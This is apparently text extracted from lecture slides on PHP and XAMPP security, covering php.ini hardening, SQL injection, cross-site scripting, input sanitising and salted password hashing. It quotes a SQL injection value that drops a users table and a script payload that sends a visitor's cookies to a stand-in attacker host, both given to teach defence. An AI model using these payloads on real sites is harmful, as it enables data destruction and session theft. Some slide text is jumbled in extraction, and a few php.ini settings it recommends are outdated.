Professional Documents
Culture Documents
PHP 17
PHP 17
PHP 17
PHP-17
XAMPP Security
• XAMPP isn't designed to be production server. At least not out of the box
• Placing the connection code in a seperate file in the directory above will
make it available to the code running, but not available to be read by
outsiders
• [Book p 12-121]
php.ini
Allows PHP scripts to access only files owned by the same user. So it prevents directory
safe_mode = on
traversal attacks
safe_mode_gid = off This works in combination as safe_mode. Does much the same thing
open_basedir = directory PHP script can access only files in a specific directory
expose_php = off Prevents PHP from disclosing information about itself in the PHP headers sent to users
GET, POST, cookies and server variables are globals by default if this is set to on. This makes
register_globals = off
them accessible to hackers. If this it set to off they are more secure.
Prevents PHP from displaying errors and warnings to the user. This could give away
display_errors = off
information useful to hackers
log_errors = on Errors and warnings are written to a log file. This can be viewed later
file_uploads = off Most applications don't need to allow file uploads. Turn it off if it is not required
SQL Injection Attack
Randall Munroe
SQL Injection Attack
Name: John'); DROP TABLE users
Comment
Script as Data
<script>document.location='http://badie.com/bad.php?
Name: cookies='+document.cookie</script>
<html>
<body>
Welcome Mr.<script>document.location='http://badie.com/
bad.php?cookies='+document.cookie</script>
</body>
Sanitising Inputs
Much as we might check an input to see if it conforms to the expected
format (phone number) we can check inputs to ensure there is nothing
malicious
• numbers
• letters
• tags
• ' (O'Conor)
• brackets
• - (Jean-Luc)
Sanitising Inputs
• Where HTML is to be allowed in data all special characters should be
converted to their HTML entities
• If one is compromised then all those using the same password are
insecure
YAHOO.COM
e-mail password
colin.manning@cit.ie bananaskins
dan.murphy@gmail.com dantheman
peter@ge.com pengineer
joe.smith@gmail.com password
Hash Function
• A hash function maps data of an arbitrary size to data of a fixed size
• The data from the arbitrarily large set is know as the key
• is one way
bananaskins sniksananab
}
DA1 Hash Function
bananaskins sniksananab
}
DA2 Hash Function
bananaskins 147
YAHOO.COM
joe.smith@gmail.com 862
Securing Passwords
YAHOO.COM
e-mail password_hash ?
colin.manning@cit.ie 147
dan.murphy@gmail.com 936 ?
peter@ge.com 954
joe.smith@gmail.com 862
DA2 Hash Function
bananaskins 147
1f73cc189528669e51aa4b851764c6c2
Whirlpool Hash Function
bananaskins • provides no insight into the value of the key
0557ab10f7fb8ce53af2af7238ae245bbc62d3629d83263879839ea87faa8f456
d1c9586b87374a5ccc54d752fc65a49fa228e76eed782b896e4629ee8dba4c0
Hash Function Vulnerabilities
• A dictionary attack could run through a list of words, has them, and
compared with the hashed values
Salting the Hash Function
• Adding salt to the key before it is sent to the hash function can make the
system more secure
• Q6d&7Xp1
1f73cc189528669e51aa4b851764c6c2
MD2 Hash Function
Q6d&7Xp1bananaskins
• Salt is added to key before sending it to the
hash function
• Q6d&7Xp1
b2e9ae6ca1f9d07f438918da82af8615
Other Uses of Hash Functions
• Data Storage
• Cryptography
• Block-chain
908
• https://www.wired.com/2016/05/hacker-lexicon-sql-injections-everyday-
hackers-favorite-attack/
• https://arstechnica.com/information-technology/2012/08/passwords-
under-assault/
• https://arstechnica.com/information-technology/2013/03/how-i-became-
a-password-cracker/